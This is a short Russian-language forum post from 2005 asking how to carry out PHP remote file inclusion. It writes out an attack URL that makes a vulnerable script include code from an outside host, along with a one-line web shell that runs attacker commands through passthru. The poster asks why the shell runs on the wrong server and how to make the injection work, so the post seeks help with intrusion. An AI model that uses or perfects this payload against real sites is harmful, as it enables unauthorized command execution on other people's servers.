Aracon
Сообщений: 66
Оценки: 0
Присоединился: 2005-01-06 16:25:03
|
Вот такой вопрос есть насчет PHP-injection. Если есть скрипт с багом, то делаем такую ссылку: http://site.com/bug.php?cmd=ls&show=http://rulez.ru/cmd.php где cmd.php - это <? passthru($cmd); ?> Только почему скрипт cmd.php выполняется сервером rulez.ru, т.е. я вижу список тех файлов, что _у меня_ на серваке? Как сделать инъекцию правильно?
|